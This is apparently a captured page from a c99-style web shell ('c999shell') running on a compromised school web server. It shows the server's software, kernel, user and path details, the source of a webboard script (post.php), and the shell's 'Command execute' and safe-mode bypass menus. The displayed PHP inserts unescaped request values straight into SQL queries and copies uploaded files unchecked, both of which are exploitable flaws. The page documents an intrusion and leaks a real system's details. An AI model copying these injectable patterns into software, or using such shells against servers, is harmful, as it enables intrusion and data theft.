Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher/ drwxr-xr-x |
Viewing file: post.php (8 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | include("../include/FunctionDB.php"); include("../config.inc.php"); include("../function.php"); ConnectDB(); ?> " , $QNote ) ; //สำหรับเปลี่ยนอักขระที่กำหนด ให้เป็นแทก html ต่างๆ $QNote = eregi_replace ( "\[b\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[/b\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[i\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[/i\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[u\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[sup\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[/sup\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[sub\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[/sub\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[/u\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[\-\-\-\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[color=red\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[color=green\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[color=blue\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[color=orange\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[color=pink\]", " " , $QNote) ; $QNote = eregi_replace ( "\[color=gray\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[/color\]", " " , $QNote ) ; $QNote = eregi_replace ( "\[glow\]"," ", $QNote ); $QNote = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","\\2://\\3\\4", $QNote ); $QNote = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","\\1@\\2\\3", $QNote ); // ตรวจสอบว่าเป็นสมาชิกหรือไม่ //mysql_connect($host,$user,$passwd); //mysql_query("SET NAMES 'tis620'"); $sql = "select Teacher_code from personal_tb WHERE Teacher_code='$Teacher_code ' "; $result = mysql_db_query($dbname,$sql); $NRow = mysql_num_rows($result); $row = mysql_fetch_array($result); // ตรวจสอบว่า Password ถูกหรือไม่ // if($QName==$row["User"] && $QPass==$row["Password"]) //{ // $Member = 1; // if(!$QEmail) // { // $QEmail = $row["Email"]; // } // } // mysql_close(); // บันทึกรูปภาพ if(($QNote =='')&&($QName=='')) { echo " "; echo ""; echo "[ กลับไปแก้ไข ] "; echo ""; echo " "; exit(); } copy ($QPic , "$path/" . $filename ); } } else { echo "
"; } // ปรับเวลาให้ตรงกับเวลาเมืองไทย กรณีที่ server อยู่ที่เมืองนอก //$mdate = date("Y-m-d H:i:s"); setlocale (LC_TIME, $locale); $mdate= strftime("%Y-%m-%d %H:%M:%S"); //$mdate= strftime("%Y-%m-%d %X"); // เขียนข้อมูลลง database mysql_connect($host,$user,$passwd); mysql_query("SET NAMES 'tis620'"); $sql = "insert into webboard_data (Category,Teacher_code,Question,Note,Name,Namer,Member,IP,Email,Date,nphoto) values ('$Category','$Teacher_code','$QTitle','$QNote','$QName','$MsgBy','$Member','$IP','$QEmail','$mdate','$filename')"; $result1 = mysql_db_query($dbname,$sql); if(!$result1) { echo "Error : Can not save to database"; exit(); } mysql_close(); ?>
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |